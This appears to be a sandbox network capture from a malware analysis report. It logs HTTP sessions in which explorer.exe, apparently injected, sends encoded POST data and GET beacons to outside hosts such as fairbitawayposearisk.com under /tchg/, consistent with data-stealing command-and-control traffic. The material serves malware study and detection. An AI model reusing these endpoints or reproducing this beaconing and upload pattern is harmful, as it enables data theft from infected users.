                                                                                                                    May 30, 2023 11:12:36.480588913 CEST1569OUTData Raw: 6f 75 79 34 55 4c 32 7e 79 53 38 7a 57 71 42 7e 65 6e 30 78 30 63 43 57 35 79 48 4e 54 7a 57 44 65 37 51 7a 53 73 2d 79 61 5a 32 4a 4f 61 5a 62 53 6d 44 59 62 6a 6f 79 39 57 79 48 74 79 78 4d 35 6e 69 6d 75 51 57 55 7a 50 41 4c 55 37 49 54 38 57
                                                                                                                    Data Ascii: ouy4UL2~yS8zWqB~en0x0cCW5yHNTzWDe7QzSs-yaZ2JOaZbSmDYbjoy9WyHtyxM5nimuQWUzPALU7IT8Wcf8oOssUXMp19sM8R2W7Uv8jTovmEBRV6pKn9WueSZ4AgR_gJ5LOqi28rfWG2JVygQnU4gKf3d-BUPahpaqjwyPeH5YvNrnfcrm2hkEkpJGYIk1ZmNT5USc~jT9GWCCo41XBoVtZQUNf9hcVgzoAzWurO3adVBh7l
                                                                                                                    May 30, 2023 11:12:36.480720043 CEST1573OUTData Raw: 39 31 49 6d 64 41 31 75 73 63 70 64 4c 65 4a 77 62 44 4d 41 74 6d 4e 42 5a 55 6b 52 31 4f 51 59 6f 4d 5f 4b 34 6a 41 4d 69 72 75 6c 54 63 4a 77 6d 4f 5a 31 74 52 45 65 31 7e 33 71 51 4f 44 63 2d 35 74 71 6a 28 39 52 4a 6d 4f 49 67 31 33 52 30 30
                                                                                                                    Data Ascii: 91ImdA1uscpdLeJwbDMAtmNBZUkR1OQYoM_K4jAMirulTcJwmOZ1tREe1~3qQODc-5tqj(9RJmOIg13R00foY95KWcc45TdlCjLVVGopBt2KCVQU2e72Lv9tEFxjGVNpHUj8yPOoWEbdpCUnRG0rmcX6pbppEYT~RYPxs6ah2wwryui45MRflGuRste7l~iFZ~wtfJG5_hbEuJeWCAg5NmjyeAVOJH4FBJ4YyewCP~6K6rPHt1A
                                                                                                                    May 30, 2023 11:12:36.480889082 CEST1574OUTData Raw: 37 28 78 48 49 70 6a 48 54 51 39 65 61 73 69 32 54 48 74 51 61 55 79 6e 76 51 47 53 4a 6e 57 59 37 45 4d 65 72 6b 5a 6c 4c 65 55 70 4b 59 46 68 50 36 43 6a 30 50 37 4f 5f 68 63 4c 58 4a 49 59 6f 71 49 4e 74 57 76 36 52 63 78 4f 54 69 58 6d 63 70
                                                                                                                    Data Ascii: 7(xHIpjHTQ9easi2THtQaUynvQGSJnWY7EMerkZlLeUpKYFhP6Cj0P7O_hcLXJIYoqINtWv6RcxOTiXmcppOETbvKZf83Nrig1SSbbxwDde60h8m-NZn3wjNRpXq7p37U~UgBfD7eiQmp43bhd83Er1tNs2JHC-7OHN5PwSHvcmZsR34lnmjtuLg5VuslxPuCtrw4kvnt3UGzNgkLwB34a4X4Ae8E(WvpFos5~OVvhcxzetLUQi
                                                                                                                    May 30, 2023 11:12:36.481101990 CEST1583OUTData Raw: 67 72 4a 59 62 37 32 54 5f 35 64 45 65 35 33 59 64 4d 75 6a 31 4b 4c 63 55 6f 44 65 4d 4a 42 4d 66 36 36 61 79 43 59 74 6e 53 6a 79 33 4e 6c 6a 52 45 43 51 5a 61 35 7a 54 49 6e 31 42 46 46 68 52 36 43 68 77 36 70 4e 61 74 52 54 52 61 71 7e 72 45
                                                                                                                    Data Ascii: grJYb72T_5dEe53YdMuj1KLcUoDeMJBMf66ayCYtnSjy3NljRECQZa5zTIn1BFFhR6Chw6pNatRTRaq~rEKdM5lU4DBlts9aZwGtAHghPozvZOLTQkpi4SNX2fRvyvcoFOkaFLj1xebwIP95NzHvCef0FJhMQdONnW_z3hQ1-eLjjbgEs1KJtLTdLIveCSo4zwol8ebseMf2b0T5WUwD_3hJe6RJolDpyFVvr5k99PAO_7L9XNN
                                                                                                                    May 30, 2023 11:12:36.491025925 CEST1586OUTData Raw: 71 44 2d 4a 35 6c 59 35 31 58 6f 30 77 67 63 75 4e 41 4c 30 63 70 70 32 44 56 77 44 31 35 7a 32 4b 56 49 66 2d 7e 51 57 5a 45 58 6a 65 6e 4b 4c 53 4c 4c 77 6f 6f 2d 4f 6e 31 38 74 2d 4b 46 42 4c 4a 6a 6e 6d 6f 59 5a 63 44 77 5a 5a 65 47 36 6c 41
                                                                                                                    Data Ascii: qD-J5lY51Xo0wgcuNAL0cpp2DVwD15z2KVIf-~QWZEXjenKLSLLwoo-On18t-KFBLJjnmoYZcDwZZeG6lAsfEii1XLa~nv_ObXsL0loKzUWfe0BXfZ6ejsAyd(QF6PiTCivnwJD1PTewg3YEHEFzHOMgXcaD9qzAHpKt28RKRpu9_j7FlF2g8Tsxo6XGLRomE1NaTNCNbvlsAYGwy~w2Tx8fjv80xGym-sYyw2J49M5qhYZWQdr
                                                                                                                    May 30, 2023 11:12:36.491110086 CEST1594OUTData Raw: 4b 28 44 53 51 59 4a 76 41 50 6f 37 49 46 31 4d 76 4c 74 55 57 30 6e 36 6a 77 2d 77 47 6a 35 75 58 70 34 61 51 6e 4d 37 50 74 61 76 53 4e 74 37 55 4b 54 74 37 42 36 73 6b 70 64 74 47 76 69 48 31 54 56 6e 78 43 68 4d 7a 59 73 75 52 69 38 7a 55 48
                                                                                                                    Data Ascii: K(DSQYJvAPo7IF1MvLtUW0n6jw-wGj5uXp4aQnM7PtavSNt7UKTt7B6skpdtGviH1TVnxChMzYsuRi8zUH58k~MM4CT(PjDgr8CiGwMUZjaNF7JkpU_Rtj1(1O2TSBgOvIsWizSWyPzWSgs04qYdgulmv0uq1U75ZweyBpfaR~AAVi09AjOIgB3Rn6AbkiI(IS6g9xqD-Um2icMPobiUfkx~Wm8xFwvaD9CbphzSOXpS9Iu97mc
                                                                                                                    May 30, 2023 11:12:36.491451025 CEST1599OUTData Raw: 2d 47 54 58 36 76 70 75 61 55 68 57 33 28 70 52 4c 49 6c 6b 33 6c 61 68 55 35 52 76 6e 55 76 76 4c 6a 61 45 47 4e 64 65 37 75 76 44 52 70 68 61 39 53 57 47 34 4f 66 36 53 67 47 74 67 32 54 32 6a 66 49 6f 35 69 39 6f 49 42 52 7e 38 42 6e 7e 43 7a
                                                                                                                    Data Ascii: -GTX6vpuaUhW3(pRLIlk3lahU5RvnUvvLjaEGNde7uvDRpha9SWG4Of6SgGtg2T2jfIo5i9oIBR~8Bn~Cz40AQN5IEBZJBSr_J500~3B5fRBjlf09fD12cNznZ-l6Ik(Ik8Fcea(Kw6tai4IRZEm2ZqU9ZrHFmBe_lyp-cYitIIu-IKuf0_AZpsHdvJAoCnV3YYk6BrJy(dnqQyKm6BV0kr3svURZrrvcw-Npad6wZqoC7ZDFUa


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    83192.168.11.2049842130.185.109.7780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:39.001168013 CEST1601OUTGET /tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.printmyride.store
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:12:39.012849092 CEST1601INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.6.2
                                                                                                                    Date: Tue, 30 May 2023 09:12:39 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 168
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    84192.168.11.2049843216.108.231.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:44.175649881 CEST1602OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.fairbitawayposearisk.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.fairbitawayposearisk.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.fairbitawayposearisk.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 63 57 49 75 4c 7a 32 36 63 6f 61 55 44 49 57 36 69 59 44 43 53 63 68 52 4d 39 72 45 37 50 47 57 73 49 62 47 4d 31 4c 53 4e 6c 56 68 53 56 67 48 55 71 43 31 36 4a 4c 41 32 35 7e 66 6b 78 53 77 32 36 6f 41 72 45 74 66 5a 62 56 51 56 66 77 63 4f 65 65 36 52 71 36 31 79 7a 42 4e 68 56 62 76 6e 31 50 42 53 4a 77 49 57 53 35 43 45 6c 76 4c 53 4b 4e 52 6e 48 75 54 38 57 45 41 4a 32 4e 74 32 32 65 75 6f 4e 56 5a 6f 44 48 56 79 42 47 37 59 6d 6a 51 52 6a 45 46 50 4b 7e 6e 64 62 58 43 46 31 4a 46 4d 4d 65 78 79 53 57 5a 32 38 61 68 69 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=cWIuLz26coaUDIW6iYDCSchRM9rE7PGWsIbGM1LSNlVhSVgHUqC16JLA25~fkxSw26oArEtfZbVQVfwcOee6Rq61yzBNhVbvn1PBSJwIWS5CElvLSKNRnHuT8WEAJ2Nt22euoNVZoDHVyBG7YmjQRjEFPK~ndbXCF1JFMMexySWZ28ahig).
                                                                                                                    May 30, 2023 11:12:45.128420115 CEST1603INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:12:44 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Content-Length: 320
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 75 73 72 5f 69 64 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 69 73 70 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 64 74 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                                                                                    Data Ascii: <br /><b>Notice</b>: Undefined variable: usr_id in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: isp in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: dt in <b>/var/www/html/newred.php</b> on line <b>51</b><br />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    85192.168.11.2049844216.108.231.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:46.864459991 CEST1604OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.fairbitawayposearisk.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.fairbitawayposearisk.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.fairbitawayposearisk.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 63 57 49 75 4c 7a 32 36 63 6f 61 55 43 70 6d 36 75 66 66 43 46 73 68 4f 44 64 72 45 30 76 47 53 73 50 54 47 4d 30 66 43 4d 54 39 68 53 31 77 48 56 6f 71 31 35 4a 4c 41 39 5a 7e 65 70 52 53 72 32 36 56 33 72 46 52 66 5a 62 42 51 57 4d 34 63 66 2d 65 35 4a 36 36 36 34 54 42 4f 72 31 62 70 6e 31 79 6f 53 4c 4d 49 52 69 46 43 46 6d 48 4c 59 34 6c 51 32 58 75 64 74 32 45 44 41 57 4e 5a 32 32 6a 54 6f 49 68 6a 6f 31 76 56 31 67 6d 37 5a 6d 6a 54 66 54 46 50 42 61 28 62 54 62 69 61 4e 30 39 69 63 74 53 72 39 7a 33 64 77 64 66 51 79 51 4f 57 54 57 4c 62 4f 5a 6a 5f 78 51 72 38 6c 6e 76 67 57 63 7a 6a 74 4b 65 35 6e 6f 55 53 47 52 53 55 56 45 47 70 7a 65 6a 54 30 39 5a 71 52 53 38 69 4f 36 63 38 6f 5f 64 6e 5a 66 41 63 7e 68 37 56 35 58 52 35 35 79 49 38 57 32 47 77 52 4f 55 69 58 4a 5a 68 73 5f 34 6c 69 66 32 50 73 5a 76 43 33 5f 68 61 45 51 79 44 4d 68 4a 48 6d 31 73 31 49 2d 46 38 4e 42 57 6e 77 50 35 7a 30 54 49 6c 72 5a 68 4d 78 32 79 56 6d 59 44 38 68 74 66 38 65 37 45 67 37 7a 54 45 7e 71 67 6e 69 79 56 37 34 61 5a 2d 7a 70 48 66 62 69 6a 50 48 51 4c 74 4f 78 77 68 39 51 55 30 51 52 79 6b 4b 30 46 67 38 42 68 77 76 4d 35 31 77 63 30 73 63 51 53 55 77 4b 46 52 6e 6f 4f 62 31 31 70 4b 68 6d 4e 37 6b 33 67 47 41 39 4c 37 7e 4e 4d 2d 42 74 49 62 34 4a 51 72 52 68 73 49 75 6d 55 39 74 57 6d 6b 79 41 69 5a 64 6c 4c 77 66 75 47 46 52 7a 4a 4d 7e 44 76 44 37 5f 4b 43 76 66 6a 44 31 65 4d 62 6d 39 39 55 50 51 52 59 6d 57 67 64 4e 72 79 77 49 4d 58 30 41 53 62 39 36 2d 72 33 64 4a 67 67 71 77 6b 2d 53 37 62 75 46 62 4b 41 69 4a 77 36 4d 55 4d 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=cWIuLz26coaUCpm6uffCFshODdrE0vGSsPTGM0fCMT9hS1wHVoq15JLA9Z~epRSr26V3rFRfZbBQWM4cf-e5J6664TBOr1bpn1yoSLMIRiFCFmHLY4lQ2Xudt2EDAWNZ22jToIhjo1vV1gm7ZmjTfTFPBa(bTbiaN09ictSr9z3dwdfQyQOWTWLbOZj_xQr8lnvgWczjtKe5noUSGRSUVEGpzejT09ZqRS8iO6c8o_dnZfAc~h7V5XR55yI8W2GwROUiXJZhs_4lif2PsZvC3_haEQyDMhJHm1s1I-F8NBWnwP5z0TIlrZhMx2yVmYD8htf8e7Eg7zTE~qgniyV74aZ-zpHfbijPHQLtOxwh9QU0QRykK0Fg8BhwvM51wc0scQSUwKFRnoOb11pKhmN7k3gGA9L7~NM-BtIb4JQrRhsIumU9tWmkyAiZdlLwfuGFRzJM~DvD7_KCvfjD1eMbm99UPQRYmWgdNrywIMX0ASb96-r3dJggqwk-S7buFbKAiJw6MUM.
                                                                                                                    May 30, 2023 11:12:47.879964113 CEST1605INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:12:47 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Content-Length: 320
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 75 73 72 5f 69 64 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 69 73 70 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 64 74 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                                                                                    Data Ascii: <br /><b>Notice</b>: Undefined variable: usr_id in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: isp in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: dt in <b>/var/www/html/newred.php</b> on line <b>51</b><br />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    86192.168.11.2049845216.108.231.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:49.551434040 CEST1610OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.fairbitawayposearisk.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.fairbitawayposearisk.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.fairbitawayposearisk.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 63 57 49 75 4c 7a 32 36 63 6f 61 55 43 70 6d 36 75 66 66 43 46 73 68 4f 44 64 72 45 30 76 47 53 73 50 54 47 4d 30 66 43 4d 54 31 68 53 6d 49 48 55 4a 71 31 34 4a 4c 41 79 4a 7e 62 70 52 54 35 32 36 4e 7a 72 46 64 50 5a 59 35 51 57 39 6f 63 66 72 71 35 63 4b 36 33 30 7a 42 4d 68 56 62 39 6e 31 50 5f 53 4b 6f 59 57 53 78 43 45 68 72 4c 53 76 35 52 7e 6e 75 54 74 32 45 45 58 47 4e 37 32 32 6d 4d 6f 49 6c 6a 6f 7a 76 56 30 54 65 37 56 52 33 54 57 6a 46 4f 48 71 28 55 63 37 69 56 4e 30 35 63 63 74 53 52 39 78 62 64 77 64 28 51 67 44 6e 41 51 32 4c 62 43 35 6a 2d 31 51 6e 77 6c 6a 50 6f 57 63 48 6a 74 49 4f 35 6d 49 55 53 44 31 47 58 57 6b 47 76 6b 2d 6a 2d 77 38 6b 47 52 53 70 47 4f 36 49 38 6f 4d 68 6e 57 4d 6f 63 35 45 50 56 77 58 52 37 33 53 49 76 59 6d 48 70 52 4f 45 45 58 4e 6c 58 73 5f 73 6c 6a 2d 57 50 6f 4c 4c 64 7e 5f 68 59 59 41 79 57 49 68 56 4c 6d 31 38 78 49 2d 46 53 4e 46 4f 6e 77 2d 4a 7a 31 53 49 6d 72 4a 68 4c 6b 6d 7a 58 39 6f 50 71 68 73 7a 4f 65 36 38 77 37 79 58 45 76 36 67 6e 33 68 39 34 6a 36 5a 35 78 70 48 4e 66 69 69 56 48 51 47 45 4f 77 30 4c 7e 67 34 30 66 41 4f 6b 63 45 46 6e 74 52 68 30 35 38 35 33 6e 4d 30 73 63 51 4f 2d 77 4b 42 52 6e 63 43 62 30 47 42 4b 6b 31 6c 37 6f 58 67 63 41 39 4c 78 7e 4e 41 64 42 75 6f 35 34 49 68 4d 52 69 41 49 75 58 45 39 73 54 4b 6e 33 77 69 63 4d 31 4b 79 51 4f 36 65 52 7a 56 45 7e 44 28 31 36 4d 4f 43 75 66 7a 44 69 4f 4d 59 77 4e 38 65 66 41 52 4b 77 6d 73 42 4e 72 75 4b 49 4e 54 6b 41 51 4c 39 36 35 65 78 48 35 63 48 6f 43 41 4d 52 4d 54 36 46 34 69 79 6c 6f 34 37 54 6a 50 78 77 57 67 4c 65 48 78 48 6c 6c 4e 31 46 36 72 67 76 6b 5a 6e 78 6f 47 6e 57 42 6f 42 4f 4a 7e 56 36 5a 77 50 51 57 4f 58 7e 30 30 69 37 4a 58 4b 6e 6e 6b 53 45 53 37 2d 7a 76 71 4e 77 6d 44 30 45 56 51 76 4d 6c 43 5f 42 4d 71 6a 39 6c 79 31 48 65 54 44 4f 79 43 33 74 77 67 49 6a 66 78 78 36 58 31 58 34 39 67 51 41 4a 70 39 6e 59 7a 77 54 76 72 59 62 72 79 74 67 33 70 6c 39 62 41 4b 7e 30 48 45 36 77 4a 51 61 5f 47 46 43 67 48 36 71 5a 4a 30 6b 57 41 48 39 6a 65 71 7a 41 54 66 51 38 37 53 42 64 6a 59 58 73 73 73 68 74 58 78 6c 44 39 55 62 4b 6b 4e 56 4c 53 42 4b 77 45 6f 75 77 6c 42 6d 39 66 7a 42 50 69 6e 31 79 31 5f 57 6a 42 38 6d 2d 45 45 6b 36 6c 39 68 50 41 76 61 56 4f 4a 61 6a 69 4f 52 72 47 6f 47 5f 56 39 62 47 50 46 4d 41 28 32 36 5a 28 41 79 71 50 74 49 52 53 48 51 44 44 46 62 39 79 4f 4b 69 53 38 6d 47 61 33 6b 6d 49 4f 37 44 74 52 6e 69 56 5f 35 6e 34 37 67 71 70 78 73 71 48 63 54 79 36 35 38 6d 32 6c 67 6f 7a 5f 4a 33 36 49 41 5f 6a 2d 6e 44 79 39 4f 33 54 51 59 5f 52 71 36 43 62 6d 50 6f 41 71 77 48 4b 4b 4b 47 45 6f 51 54 57 6f 33 56 68 71 7e 71 54 49 79 4c 6b 73 56 63 68 45 33 79 73 5a 70 6f 63 43 64 66 55 77 69 6d 4a 66 7a 54 57 31 4e 6b 61 6d 7a 77 39 33 39 41 49 6b 72 68 7e 6d 53 61 46 64 67 50 5a 47 43 72 61 53 42 59 30 64 6c 78 34 79 73 64 71 54 5a 61 77 50 7e 63 4e 34 66 45 71 74 51 79 6c 63 6f 59 4c 45 4d 38 65 31 45 68 4f 52 69 4f 57 7a 7a 78 63 58 48 79 67 30 48 66 66 6a 38 6a 65 7a 53 31 51 4d 44 61 59 47 7e 68 65 51 72 6b 32 36 73 4f 4c 4d 4d 7a 79 49 6c 70 35 72 56 4a 6e 74 48 53 32 4e 7e 45 65 34 70 43 68 64 6d 64 65 32 44 6c 45 70 30 4a 46 50 72 70 50 66 4e 65 6a 35 66 47 5a 4b 79 57 61 34 6f 70 57 73 7e 62 43 58 36 72 4b 63 52 49 69 68 4b 56 31 65 42 63 4b 57 73 68 72 79 78 50 6c 54 59 45 49 6e 28 51 61 75 4f 72 77 39 4c 53 79 53 45 4a 4d 76 34 6a 76 61 79 65 7a 5f 4a 6a 38 36 50 53 75 69 7e 76 66 51 6a 75 4a 71 6b 70 61 52 35 75 70 63 35 50 45 69 71 35 6c 66 57 30 66 2d 4b 4f 61 73 5a 6b 74 69 70 34 58 51 39 41 49 44 50 73 39 32 6a 69 41 79 4e 54 47 59 61 71 59 55 58 55 69 54 65 57 6d 4b 78 6a 67 61 31 4d 36 53 39 33 50 36 6a 38 70 6e 28 75 6a 72 28 4e 44 31 6f 30 7e 66 78 70 63 53 55 31 44 7a 46 5f 4d 38 54 55 75 61 74 6b 4c 43 4d 64 74 4f 32 33 51 4b 36 76 57 72 38 4d 39 71 50 32 42 30 70 55 6b 67 37 54 68 75 7e 72 76 44 4e 35 28 48 7e 48 47 76 6f 6a 35 49 44 4e 31 36 54 58 28 4f 79 76 35 37 33 56 36 6e 74 6b 4a 55 7e 67 6a 44 4b 65 76 75 49 50 63 68 30 74 33 6e 74 31 46 4a 37 77 30 67 34 63 38 5a 4a 46 68 74 35 75 76 65 79 34 57 72 6c
                                                                                                                    Data Ascii: O0qEM=cWIuLz26coaUCpm6uffCFshODdrE0vGSsPTGM0fCMT1hSmIHUJq14JLAyJ~bpRT526NzrFdPZY5QW9ocfrq5cK630zBMhVb9n1P_SKoYWSxCEhrLSv5R~nuTt2EEXGN722mMoIljozvV0Te7VR3TWjFOHq(Uc7iVN05cctSR9xbdwd(QgDnAQ2LbC5j-1QnwljPoWcHjtIO5mIUSD1GXWkGvk-j-w8kGRSpGO6I8oMhnWMoc5EPVwXR73SIvYmHpROEEXNlXs_slj-WPoLLd~_hYYAyWIhVLm18xI-FSNFOnw-Jz1SImrJhLkmzX9oPqhszOe68w7yXEv6gn3h94j6Z5xpHNfiiVHQGEOw0L~g40fAOkcEFntRh05853nM0scQO-wKBRncCb0GBKk1l7oXgcA9Lx~NAdBuo54IhMRiAIuXE9sTKn3wicM1KyQO6eRzVE~D(16MOCufzDiOMYwN8efARKwmsBNruKINTkAQL965exH5cHoCAMRMT6F4iylo47TjPxwWgLeHxHllN1F6rgvkZnxoGnWBoBOJ~V6ZwPQWOX~00i7JXKnnkSES7-zvqNwmD0EVQvMlC_BMqj9ly1HeTDOyC3twgIjfxx6X1X49gQAJp9nYzwTvrYbrytg3pl9bAK~0HE6wJQa_GFCgH6qZJ0kWAH9jeqzATfQ87SBdjYXssshtXxlD9UbKkNVLSBKwEouwlBm9fzBPin1y1_WjB8m-EEk6l9hPAvaVOJajiORrGoG_V9bGPFMA(26Z(AyqPtIRSHQDDFb9yOKiS8mGa3kmIO7DtRniV_5n47gqpxsqHcTy658m2lgoz_J36IA_j-nDy9O3TQY_Rq6CbmPoAqwHKKKGEoQTWo3Vhq~qTIyLksVchE3ysZpocCdfUwimJfzTW1Nkamzw939AIkrh~mSaFdgPZGCraSBY0dlx4ysdqTZawP~cN4fEqtQylcoYLEM8e1EhORiOWzzxcXHyg0Hffj8jezS1QMDaYG~heQrk26sOLMMzyIlp5rVJntHS2N~Ee4pChdmde2DlEp0JFPrpPfNej5fGZKyWa4opWs~bCX6rKcRIihKV1eBcKWshryxPlTYEIn(QauOrw9LSySEJMv4jvayez_Jj86PSui~vfQjuJqkpaR5upc5PEiq5lfW0f-KOasZktip4XQ9AIDPs92jiAyNTGYaqYUXUiTeWmKxjga1M6S93P6j8pn(ujr(ND1o0~fxpcSU1DzF_M8TUuatkLCMdtO23QK6vWr8M9qP2B0pUkg7Thu~rvDN5(H~HGvoj5IDN16TX(Oyv573V6ntkJU~gjDKevuIPch0t3nt1FJ7w0g4c8ZJFht5uvey4Wrly7jRQaDyCFqOo684QolWQzDWtdViRjhSPrNkbKqs9JfYzKSAPk-fWS6WhdxUw6Nsip-cjjBaCTaAFCvlaF50a(Skb(5nz0sgJAOANnAHOfmLk7dETrJGSrCEYyW1bVMp03pw2638u(TeApm6KQ5wRHTk2gUNwuYK25bE2IUS1rz~6DlZlL_jvr-(zU9KWBM3sfkChsEbCxEG7ThB8wGtd7OIzVe6vN3lnqI8ZBbPoX6Oa9H2tP6oXqbbL